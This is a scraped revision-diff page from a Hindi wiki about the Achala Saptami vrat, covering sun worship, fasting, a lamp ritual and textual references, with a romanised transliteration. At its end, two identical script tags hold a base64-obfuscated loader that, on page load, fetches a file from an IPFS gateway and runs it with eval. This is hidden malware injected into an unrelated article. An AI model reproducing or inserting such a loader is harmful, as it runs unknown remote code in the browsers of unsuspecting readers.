Difference between revisions of "अचला सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 3: Line 3:
 
*सप्तमी की रात्रि के अन्त में एक हाथ में दीप लेकर स्थिर जल को हिला दिया जाता है। <ref>हेमाद्रि व्रतखण्ड (1, 643–648)</ref>  
 
*सप्तमी की रात्रि के अन्त में एक हाथ में दीप लेकर स्थिर जल को हिला दिया जाता है। <ref>हेमाद्रि व्रतखण्ड (1, 643–648)</ref>  
 
*[[कृष्ण]] ने [[युधिष्ठर]] को उस वेश्या इन्दुमती की कथा सुनाई है, जिसने पश्चाताप में आकर अचलासप्तमी का सम्पादन किया जाता है।<ref>भविष्योत्तर पुराण में उद्धरण</ref>
 
*[[कृष्ण]] ने [[युधिष्ठर]] को उस वेश्या इन्दुमती की कथा सुनाई है, जिसने पश्चाताप में आकर अचलासप्तमी का सम्पादन किया जाता है।<ref>भविष्योत्तर पुराण में उद्धरण</ref>
*व्रतार्क, व्रतराज<ref> (253–255)</ref> निर्णयामृत (51) में इसे जयन्ती भी कहा गया है।
+
*व्रतार्क, व्रतराज<ref>व्रतराज (253–255)</ref> निर्णयामृत (51) में इसे जयन्ती भी कहा गया है।
 
* इस दिन [[भास्कर]] का ध्यान करना चाहिए।  
 
* इस दिन [[भास्कर]] का ध्यान करना चाहिए।  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 07:40, 6 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • magh shuklapaksh ki saptami; soory pooja; shashthi ko ekabhakt evan saptami ko upavas.
  • saptami ki ratri ke ant mean ek hath mean dip lekar sthir jal ko hila diya jata hai. [1]
  • krishna ne yudhishthar ko us veshya indumati ki katha sunaee hai, jisane pashchatap mean akar achalasaptami ka sampadan kiya jata hai.[2]
  • vratark, vrataraj[3] nirnayamrit (51) mean ise jayanti bhi kaha gaya hai.
  • is din bhaskar ka dhyan karana chahie.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hemadri vratakhand (1, 643–648)
  2. bhavishyottar puran mean uddharan
  3. vrataraj (253–255)

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>